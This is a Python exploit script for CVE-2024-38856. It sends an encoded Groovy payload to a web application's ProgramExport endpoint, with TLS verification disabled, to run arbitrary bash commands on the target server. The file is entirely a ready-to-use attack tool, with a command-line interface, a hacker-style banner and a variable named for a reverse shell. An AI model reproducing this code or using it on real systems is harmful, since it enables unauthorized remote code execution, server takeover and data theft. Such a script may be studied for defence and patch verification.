exploit.py

import requests
import sys
import argparse
import base64
import urllib3

#Suppressing warnings related to insecure web requests in Python
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def ascii():
    art = print("""   _  _         _     _   _          ___ _       
 | || |__ _ __| |__ | |_| |_  ___  | _ \ |__ _ _ _  ___| |_ 
 | __ / _` / _| / / |  _| ' \/ -_) |  _/ / _` | ' \/ -_)  _|
 |_||_\__,_\__|_\_\  \__|_||_\___| |_| |_\__,_|_||_\___|\__|
""")
    return art 
    
def exploit(targetURL,payload):
    revShellBase64 = base64.b64encode(payload.encode()).decode()
    
    #Unicode Encoding the base64 payload
    finalPayload = f'["bash", "-c", "{{echo,{revShellBase64}}}|{{base64,-d}}|{{bash,-i}}"].execute().text'
    
    unicode_escape_payload = finalPayload.encode('unicode_escape').decode('ascii')
    

    exploitURL = f"{targetURL}webtools/control/main/ProgramExport"
    data = f"groovyProgram={unicode_escape_payload}"
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    
    sendPayload = requests.get(exploitURL, params=data, headers=headers, verify=False)
    
      
def main():
    parser = argparse.ArgumentParser(description="CVE-2024-38856")
    parser.add_argument("url", help="The target URL")
    parser.add_argument("payload", help="The payload") 
    args = parser.parse_args()
    
    try:
        ascii()
        return(exploit(args.url, args.payload))
            
    except Exception as e:
        sys.exit(f"Some error occured: {e}")

if __name__ == "__main__":  
    main()